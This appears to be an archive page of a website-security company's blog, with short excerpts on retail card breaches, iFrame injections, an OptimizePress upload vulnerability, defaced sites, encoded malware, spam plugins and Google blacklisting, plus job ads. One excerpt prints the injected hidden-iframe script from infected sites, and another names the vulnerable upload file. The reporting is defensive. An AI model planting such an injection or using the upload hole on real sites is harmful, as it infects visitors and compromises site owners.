Many Pieces of a Puzzle: Target, Neiman Marcus and Website Hacking

Corporations get hacked all the time. This is not news to anyone in the security business, but it has certainly received a lot of attention from those in the media over the last few weeks because of a couple of large-scale credit card events at both Target and Neiman Marcus.

Website Malware

Read More

New iFrame Injections Leverage PNG Image Metadata

We’re always trying to stay ahead of the latest trends, and today we caught a very interesting one that we have either been missing, or it’s new. We’ll just say it’s new.. ;)

We’re all familiar with the idea of iFrame Injections, right?

Understanding an iFrame Injection

The iFrame HTML tag is very standard today, it’s an easy way to embed content from another site into your own. It’s supported by almost all browsers and employed by millions of websites today, use Adsense? Then you have an iFrame embedded within your site too.

Pretty nifty, I know. Like with most things though, the good is always accompanied with the bad.

Read More

Recent OptimizePress Vulnerability Being Mass Infected

A few weeks ago we wrote about a file upload vulnerability in the OptmizePress theme. We were seeing a few sites being compromised by it, but nothing major.

That all changed yesterday when we detected roughly 2,000 websites compromised with iFrames that seemed to be caused by this same vulnerability. All of the contaminated websites that we have reviewed and cleared were using OptmizePress, and they all had the same iFrame injected in them:

<script> if(document.all ){ document.write ("<iframe 
 src=" httx:// gezidotojyk.org/ ohui.cgi?19" width="1" 
height="1"></iframe>"


Read More

Sucuri Company Meeting – Brazil 2014

2013 was a great year for Sucuri! We were able to add some great services and tools like CloudProxy to help website owners and administrators fight malware. We also grew the Sucuri team quite a bit in an effort to support our products, and more importantly our customers.

We’re very excited about the future, so much so that we pulled in the team for a company meeting to kick off 2014 strong.

As you can see, always working together as a team, even during some sightseeing. In 2014 we expect to continue building the team, and also continue to offer the best malware protective, monitoring, and remediation tools for website owners.

Here is a small gallery of photos taken during the event.

We’ll try to post more images and videos throughout the week. We hope you enjoy!


If you’re looking for new opportunities and want to join an awesome website security company, check our the Sucuri Employment page.

Friday the 13th – A Gallery of Webmaster Nightmares

This post is dedicated to all you geeky horror movie fans out there!

One morning you open your website and don’t recognize it. Something is devastatingly wrong. You wipe the sleep from your eyes, and instantly you know that you’re living your worst nightmare…

As you gain early morning focus from what you thought was a good night sleep, a scary face stares back at you, and declares that you’ve been hacked!

When you see it you know it’s, it’s…it’s…it’s Friday the 13th!!!

Hacked Website Defacement

It’s always Friday the 13th for webmasters of defaced sites, regardless of what their calendar tells. It becomes the most unlucky day in their webmaster life, the day when only bad things can happen.

Hacked Website Defacement 2

We, at Sucuri, come across such hacked sites every day. Every day we help website owners like you survive your Friday the 13th. We restore your sites and make sure this don’t happen again.

When your site is finally restored, and you calm down after the stressful fight for your site, it may eventually occur to you that the defaced page was a piece of some weird modern cyber art.

Hacked Website Defacement 3

OK, maybe you weren’t comparing your defacement to your favorite Van Gogh. We have seen defaced websites every day for the last few years, and after a while you start finding artistic value in some of the “hacked by..” pages you come across.

Sometimes they are disturbing and offensive, sometimes they are scary. Sometimes they are funny, and sometimes they even provide security advice.
In the end, they all reflect the sub-culture of h4x0r$.

Hacked Website Defacement 4

In this post, we’d like to share our collection of screenshots of defaced websites. Lean back and submerge into the world of cyber-chaos.
Once you emerge back from the craziness, think to yourself, and ask yourself the simple question, “Am I prepared to deal with such unfortunate events?”

Hacked Website Defacement 5

Hacked Website Defacement 6

Hacked Website Defacement 7

Hacked Website Defacement 8

Hacked Website Defacement 9

Hacked Website Defacement 10

Hacked Website Defacement 11

Hacked Website Defacement 12

Hacked Website Defacement 13

You can find 100 more screenshots and the whole collection on the Sucuri Facebook page.

——————

Have you encountered such defaced pages on the Internet? Share your own website nightmare, on this eery Friday the 13th!

WordPress OptimizePress Theme – File Upload Vulnerability

We’re a few days short on this, but it’s still worth releasing as the number of attacks against this vulnerability are increasing ten-fold.

The folks at OSIRT were the first to report this in late November, 2013. In our cases we’re seeing mostly defacement attacks, and although not devastating, they can be a big nuisance for an unsuspecting website owner.

Please be sure to read the official announcement by the OptimizePress team.

This is an important announcement for OptimizePress 1.0 users. (Please note this does NOT apply to OptimizePress 2.0 which is built with a completely new codebase)

Back in April 2013 we discovered a potential security flaw in part of the code for OptimizePress 1.0. Our developers quickly patched this issue and we released an update to the platform. We also announced this to our customers via email, although it appears now that many of our users may not have received this email. – OptimizePress Team (Read Full)

The Vulnerability

The target of the attack is the following file: lib/admin/media-upload.php. It can be used to upload any file to the wp-content/uploads/optpress/images_comingsoon directory. It doesn’t even change the extension.

Vulnerable versions of this file provide the upload functionality to anyone, while newer patched versions check for the admin permissions first. It is easy to tell one from the other.

The beginning of the vulnerable files:

Read More

Sucuri is Hiring – Employment Opportunities

It’s always an exciting time when we can reach out to our community and let folks know that there are new opportunities to join our company. That is where we find ourselves today.

We have reached a point where we need to reach out again and continue our growth trajectory. We are looking for a few good men and women in a variety of fields to join us.

Do you fit any of these?

If so, then let us know because we want to hear from you.


System Administrator (022517)

Technical Requirements:

  • Strong system administration and networking experience
  • Linux Knowledge – High
  • Nginx / Apache – High
  • OpenSSL – High
  • Shell Scripting – High
  • HIDS / IPS / IDS – High

Senior PHP Developer / Ops (022514)

Technical Requirements:

  • Senior developer who can write lean, secure PHP 5 code
  • Ability to adapt to various languages
  • Linux administration and management experience – Plus
  • Firm understanding of security principles and use of good security practices
  • Broad understanding of web architecture and scalable platforms

Senior Security Researcher (022515)

Technical Requirements:

  • Experience white-hat hacking and finding vulnerabilities in web applications / web stacks.
  • Experience with a variety of programming languages, frameworks (WordPress, Joomla, vBulletin, Wiki, etc..) and an understanding on how to exploit them.
  • Strong understand of PHP and SQL is a plus
  • Ability to write Proof of Concepts against vulnerabilities is a plus
  • Knowledge of research and white hat security tools
  • You can take a web site, find vulnerabilities, suggest fixes and build ways to prevent that from being exploited
  • Malware decoding experience is a plus

Senior Frontend Developer (022516)

Technical Requirements:

  • Strong HTML, Javascript and CSS experience
  • Ability to effectively convert designs to functional front-end code
  • Familiarity with CMS applications (i.e., WordPress, Joomla, etc..) is a plus
  • You have built other products before and know what it takes to create responsive and intuitive design

Please submit your resume

If any of these positions sound like something you think you’d be able to excel at then we want to hear from you. Send us an email with your resume to jobs@sucuri.net, and let us know why you’d be awesome to work with.

Back to Employment Opportunities

How We Decoded Some Nasty Multi-Level Encoded Malware

From time to time, we come up with interesting bits of malware that are just calling us to decode and learn more about them. This is one of those cases.

Recently, I crossed pathes with this little gem:

dissecting-malware-step-1

That snippet is encoded malicious content. The full payload is is much bigger, 12816 characters, to be exact. Seems benign, right? At least it looks interesting. So interesting that I decided to dissect it, piece by piece.

Read More

Another Fake WordPress Plugin – And Yet Another SPAM Infection!

We clean hundreds and thousands of infected websites, a lot of the cleanups can be considered to be somewhat “routine”. If you follow our blog, you often hear us say we’ve seen “this” numerous times, we’ve cleaned “that” numerous times.

In most cases when dealing with infected websites, we know where to look and what to remove, generally with a quick look we can determine what’s going. Despite our experience and passion for cleaning up a hacked website, there are always surprises lurking and waiting for us, almost every day.

Some of the most interesting routine cases we deal with are often websites with SPAM. SPAM is in the database, or the whole block of SPAM code is stored in some obscure file. We also deal with cases where the SPAM is loaded within the theme or template header, footer, index, etc. Sometimes these SPAM infections are conditional (e.g. They only appear once per IP), sometimes not.

More often than not however, these infections is not too difficult to identify and remove. In the case we’re writing about in this post, we were able not only to remove malware, but also take a look at what’s going on behind the curtain.

Read More

Understanding Google’s Blacklist – Cleaning Your Hacked Website and Removing From Blacklist

Today we found an interesting case where Google was blacklisting a client’s site but not sharing the reason why. The fact they were sharing very little info should not be new, but what we found as we dove a little deeper should be. The idea is to provide you webmasters with the required insight to understand what is going on, and how to troubleshoot things when your website is blacklisted.

Get Your Bearing

While investigating the website, we found that some Google shortened URLs were being loaded and redirecting to http://bls.pw/. Two of the goo.gl links were pointing to Wikipedia images, their icon to be specific, and one was redirecting to http://bls.pw/ shortener.

goo.gl/9yBTe - http://bits.wikimedia.org/favicon/wikipedia.ico
goo.gl/hNVXP - http://bits.wikimedia.org/favicon/wikipedia.ico?2x2
goo.gl/24vi1 - http://bls.pw/

A quick search for this last URL took us to /wp-content/themes/Site’sTheme/css/iefix.sct. As malware writers like to do, it was trying to trick us into believing it was good code. In this case, the Sizzle CSS Selector Engine code (Real code here) was the target:

Sucuri  Sizzle CSS Selector Engine Modified III

Read More